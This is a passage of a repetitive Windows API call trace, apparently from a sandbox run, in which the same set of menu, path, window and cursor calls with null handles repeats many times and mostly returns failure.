GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.026] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.026] GetStockObject (i=6) returned 0x1b00018 [0176.026] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.026] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.026] PathFileExistsW (pszPath=0x0) returned 0 [0176.026] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.026] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.026] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.026] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.026] GetMenu (hWnd=0x0) returned 0x0 [0176.026] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x354) returned -1 [0176.026] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.026] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.026] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.027] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.027] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.027] GetStockObject (i=6) returned 0x1b00018 [0176.027] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.027] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.027] PathFileExistsW (pszPath=0x0) returned 0 [0176.027] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.027] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.027] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.027] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.027] GetMenu (hWnd=0x0) returned 0x0 [0176.027] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x206) returned -1 [0176.027] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.027] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.027] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.027] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.027] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.027] GetStockObject (i=6) returned 0x1b00018 [0176.027] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.027] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.027] PathFileExistsW (pszPath=0x0) returned 0 [0176.027] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.027] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.027] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.027] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.027] GetMenu (hWnd=0x0) returned 0x0 [0176.027] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.027] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.027] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.027] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.027] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.027] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.027] GetStockObject (i=6) returned 0x1b00018 [0176.027] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.028] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.028] PathFileExistsW (pszPath=0x0) returned 0 [0176.028] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.028] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.028] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.028] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.028] GetMenu (hWnd=0x0) returned 0x0 [0176.028] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x354) returned -1 [0176.028] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.028] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.028] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.028] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.028] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.028] GetStockObject (i=6) returned 0x1b00018 [0176.028] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.028] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.028] PathFileExistsW (pszPath=0x0) returned 0 [0176.028] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.028] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.028] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.028] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.028] GetMenu (hWnd=0x0) returned 0x0 [0176.028] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.028] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.028] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.028] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.028] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.028] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.028] GetStockObject (i=6) returned 0x1b00018 [0176.028] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.028] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.028] PathFileExistsW (pszPath=0x0) returned 0 [0176.028] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.028] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.028] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.029] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.029] GetMenu (hWnd=0x0) returned 0x0 [0176.029] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x354) returned -1 [0176.029] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.029] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.029] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.029] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.029] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.029] GetStockObject (i=6) returned 0x1b00018 [0176.029] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.029] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.029] PathFileExistsW (pszPath=0x0) returned 0 [0176.029] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.029] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.029] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.029] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.029] GetMenu (hWnd=0x0) returned 0x0 [0176.029] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x10b) returned -1 [0176.029] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.029] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.029] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.029] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.029] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.029] GetStockObject (i=6) returned 0x1b00018 [0176.029] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.029] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.029] PathFileExistsW (pszPath=0x0) returned 0 [0176.029] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.029] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.029] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.029] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.029] GetMenu (hWnd=0x0) returned 0x0 [0176.029] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.029] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.029] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.030] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.030] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.030] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.030] GetStockObject (i=6) returned 0x1b00018 [0176.030] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.030] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.030] PathFileExistsW (pszPath=0x0) returned 0 [0176.030] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.030] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.030] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.030] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.030] GetMenu (hWnd=0x0) returned 0x0 [0176.030] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x354) returned -1 [0176.030] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.030] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.030] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.030] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.030] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.030] GetStockObject (i=6) returned 0x1b00018 [0176.030] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.030] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.030] PathFileExistsW (pszPath=0x0) returned 0 [0176.030] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.030] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.030] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.030] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.030] GetMenu (hWnd=0x0) returned 0x0 [0176.030] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.030] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.030] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.030] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.030] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.030] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.030] GetStockObject (i=6) returned 0x1b00018 [0176.030] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.031] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.031] PathFileExistsW (pszPath=0x0) returned 0 [0176.031] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.031] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.031] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.031] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.031] GetMenu (hWnd=0x0) returned 0x0 [0176.031] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.031] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.031] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.031] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.031] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.031] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.031] GetStockObject (i=6) returned 0x1b00018 [0176.031] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.031] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.031] PathFileExistsW (pszPath=0x0) returned 0 [0176.031] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.031] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.031] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.031] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.031] GetMenu (hWnd=0x0) returned 0x0 [0176.031] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x225) returned -1 [0176.031] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.031] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.031] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.031] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.031] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.031] GetStockObject (i=6) returned 0x1b00018 [0176.031] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.031] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.031] PathFileExistsW (pszPath=0x0) returned 0 [0176.031] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.031] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.032] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.032] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.032] GetMenu (hWnd=0x0) returned 0x0 [0176.032] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.032] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.032] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.032] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.032] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.032] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.032] GetStockObject (i=6) returned 0x1b00018 [0176.032] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.032] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.032] PathFileExistsW (pszPath=0x0) returned 0 [0176.032] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.032] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.032] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.032] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.032] GetMenu (hWnd=0x0) returned 0x0 [0176.032] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.032] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.032] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.032] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.032] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.032] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.032] GetStockObject (i=6) returned 0x1b00018 [0176.032] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.032] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.032] PathFileExistsW (pszPath=0x0) returned 0 [0176.032] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.032] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.032] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.032] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.032] GetMenu (hWnd=0x0) returned 0x0 [0176.032] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.032] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.033] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.033] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.033] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.033] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.033] GetStockObject (i=6) returned 0x1b00018 [0176.033] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.033] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.033] PathFileExistsW (pszPath=0x0) returned 0 [0176.033] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.033] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.033] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.033] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.033] GetMenu (hWnd=0x0) returned 0x0 [0176.033] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.033] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.033] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.033] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.033] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.033] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.033] GetStockObject (i=6) returned 0x1b00018 [0176.033] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.033] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.033] PathFileExistsW (pszPath=0x0) returned 0 [0176.033] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.033] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.033] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.033] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.033] GetMenu (hWnd=0x0) returned 0x0 [0176.033] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x2ec) returned -1 [0176.033] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.033] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.033] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.033] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.033] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.034] GetStockObject (i=6) returned 0x1b00018 [0176.034] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.034] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.034] PathFileExistsW (pszPath=0x0) returned 0 [0176.034] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.034] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.034] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.034] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.034] GetMenu (hWnd=0x0) returned 0x0 [0176.034] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.034] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.034] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.034] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.034] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.034] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.034] GetStockObject (i=6) returned 0x1b00018 [0176.034] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.034] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.034] PathFileExistsW (pszPath=0x0) returned 0 [0176.034] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.034] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.034] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.034] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.034] GetMenu (hWnd=0x0) returned 0x0 [0176.034] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x351) returned -1 [0176.034] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.034] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.034] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.034] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.034] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.034] GetStockObject (i=6) returned 0x1b00018 [0176.034] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.034] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.034] PathFileExistsW (pszPath=0x0) returned 0 [0176.034] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.034] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.035] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.035] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.035] GetMenu (hWnd=0x0) returned 0x0 [0176.035] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, 